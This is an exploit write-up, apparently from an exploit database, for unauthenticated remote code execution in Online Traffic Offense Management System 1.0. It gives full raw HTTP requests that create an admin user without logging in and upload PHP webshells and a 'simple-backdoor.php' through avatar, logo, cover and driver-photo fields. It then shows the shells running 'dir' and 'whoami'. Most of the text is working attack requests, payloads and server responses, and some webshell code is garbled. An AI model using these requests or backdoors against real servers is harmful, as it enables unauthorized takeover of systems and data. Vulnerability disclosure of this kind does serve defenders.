# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### RCE - Remote Code Execution # All requests can be sent by both an authenticated and a non-authenticated user # RCE - we can exploit the RCE vulnerability in several ways: * Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver * System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info * User profile edit avatar - http://localhost/traffic_offense/admin/?page=user * Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user * Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2 ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1 # Request send as Unauthenticated user POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685 Content-Length: 1184 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=user/manage_user Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="id" -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="firstname" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="lastname" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="username" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="password" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="type" 1 -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="img"; filename="cmd.php" Content-Type: application/octet-stream
-----------------------------210106920639395210803657370685-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 07:59:24 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 ----------------------------------------------------------------------------------------------------------------------- # The file was uploaded to the uploads directory # Request to list files in uploads\ GET /traffic_offense/uploads/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:06:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 2139 Content-Type: text/html;charset=UTF-8 Index of /traffic_offense/uploads

Index of /traffic_offense/uploads

[...] ----------------------------------------------------------------------------------------------------------------------- # Request to webshell GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:10:10 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 810 Connection: close Content-Type: text/html; charset=UTF-8 
 Volume in drive C has no label.
 Volume Serial Number is 283C-C6A0

 Directory of C:\xampp\htdocs\traffic_offense\uploads

07.10.2021  10:09              .
07.10.2021  10:09              ..
19.08.2021  09:24            11ÿ426 1629336240_avatar.jpg
20.08.2021  08:58             5ÿ288 1629421080_tl-logo.png
07.10.2021  07:31             3ÿ451 1633584660_xss.svg
07.10.2021  09:59               252 1633593540_cmd.php
07.10.2021  10:02               252 1633593720_cmd.php
07.10.2021  09:02              drivers
               5 File(s)         20ÿ669 bytes
               3 Dir(s)  86ÿ494ÿ085ÿ120 bytes free
----------------------------------------------------------------------------------------------------------------------- ## Example 2 # Webshell as System Logo and next webshell as Potal Cover in System Information page # Request POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833 Content-Length: 3176 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=system_info Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="name" Online Traffic Offense Management System - PHP -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="short_name" OTOMS - PHP -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="about_us"

About Us

Sample only

-----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="img"; filename="cmd.php" Content-Type: application/octet-stream
-----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="cover"; filename="list.php" Content-Type: application/octet-stream " . $filename . "
"; } closedir($handle); } else { echo "FILE: " . $fichero . "
";
  $fp = fopen($fichero, "r");
  $buffer = fread($fp, filesize($fichero));
  echo $buffer;
  fclose($fp);
  }

?>
-----------------------------339921602532596419562348365833--

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:21:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------

# The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php

## Example 3

# Webshell as photo in driver list page

# Request

POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
Content-Length: 2148
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="id"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_id_no"

vvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="lastname"

vvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="firstname"

vvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="middlename"

vvvvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="dob"

2021-10-07
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="present_address"

vvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="permanent_address"

vvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="civil_status"

Single
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="nationality"

vvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="contact"

vvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_type"

Student
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="image_path"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
Content-Type: application/octet-stream



";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "
"; die; } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -----------------------------12210274961293066124133837204-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:35:21 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ----------------------------------------------------------------------------------------------------------------------- # Request to webshell GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:39:15 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 95 Connection: close Content-Type: text/html; charset=UTF-8 
desktop-uhrf0c6\hubert
[ICO]NameLast modifiedSizeDescription
[PARENTDIR]Parent Directory   -  
[IMG]1629336240_avatar.jpg 2021-08-19 09:24 11K 
[IMG]1629421080_tl-logo.png 2021-08-20 08:58 5.2K 
[IMG]1633584660_xss.svg 2021-10-07 07:31 3.4K 
[TXT]1633593540_cmd.php